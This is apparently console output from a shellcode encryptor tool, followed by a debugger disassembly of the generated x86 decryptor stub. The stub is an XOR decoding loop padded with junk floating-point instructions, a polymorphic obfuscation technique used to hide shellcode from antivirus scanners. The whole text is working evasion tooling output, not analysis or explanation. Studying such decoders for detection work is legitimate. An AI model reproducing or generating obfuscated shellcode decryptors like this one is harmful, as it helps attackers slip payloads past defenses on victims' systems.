[+] Decryptor body size = 128 bytes
[+] Shellcode size = 349 bytes
[+] Decryptor + Shellcode size = 477 bytes
[+] Magic byte is 3E
[+] Crypto steping = 3 byte(s)
[+] Pass steping = 1 byte(s)
[+] Shellcode dumped to D:\asm\shell.txt.tapion_bin
[+] Written 482 bytes
[+] Shellcode header stored to D:\asm\shell.txt.tapion_bin.h

00401093   68 AEE8430E      PUSH 0E43E8AE
00401098   5A               POP EDX
00401099   81EA AEE8430E    SUB EDX,0E43E8AE
0040109F   33D2             XOR EDX,EDX
004010A1   66:C7C2 99DD     MOV DX,0DD99
004010A6   66:81C2 C423     ADD DX,23C4
004010AB   C7C3 5B53C376    MOV EBX,76C3535B
004010B1   53               PUSH EBX
004010B2   8BDC             MOV EBX,ESP
004010B4   FFD3             CALL EBX
004010B6   53               PUSH EBX
004010B7   FC               CLD
004010B8   DEE9             FSUBP ST(1),ST
004010BA   09FF             OR EDI,EDI
004010BC   5E               POP ESI
004010BD   68 8ABB825A      PUSH 5A82BB8A
004010C2   59               POP ECX
004010C3   81E9 D1B9825A    SUB ECX,5A82B9D1
004010C9   8B3E             MOV EDI,DWORD PTR DS:[ESI]
004010CB   46               INC ESI
004010CC   313C19           XOR DWORD PTR DS:[ECX+EBX],EDI
004010CF   803E 3E          CMP BYTE PTR DS:[ESI],3E
004010D2   9B               WAIT
004010D3   DBE3             FINIT
004010D5   D9F6             FDECSTP
004010D7   D9F9             FYL2XP1
004010D9   75 12            JNZ SHORT testsh.004010ED
004010DB   D9FD             FSCALE
004010DD   DEF9             FDIVP ST(1),ST
004010DF   D9E8             FLD1
004010E1   D9F3             FPATAN
004010E3   53               PUSH EBX
004010E4   DDD9             FSTP ST(1)
004010E6   D9F5             FPREM1
004010E8   5E               POP ESI
004010E9   D9E8             FLD1
004010EB   D9F6             FDECSTP
004010ED   49               DEC ECX
004010EE   85D2             TEST EDX,EDX
004010F0   21FF             AND EDI,EDI
004010F2   49               DEC ECX
004010F3   DDE9             FUCOMP ST(1)
004010F5   D9D0             FNOP
004010F7   49               DEC ECX
004010F8   4A               DEC EDX
004010F9   DDD1             FST ST(1)
004010FB   85DB             TEST EBX,EBX
004010FD   DEF1             FDIVRP ST(1),ST
004010FF   4A               DEC EDX
00401100   DEE1             FSUBRP ST(1),ST
00401102   D9F9             FYL2XP1
00401104   4A               DEC EDX
00401105   21D2             AND EDX,EDX
00401107   D9E9             FLDL2T
00401109   DDD9             FSTP ST(1)
0040110B   DDE9             FUCOMP ST(1)
0040110D   DDD9             FSTP ST(1)
0040110F  ^7F B8            JG SHORT testsh.004010C9
00401111   DEC9             FMULP ST(1),ST

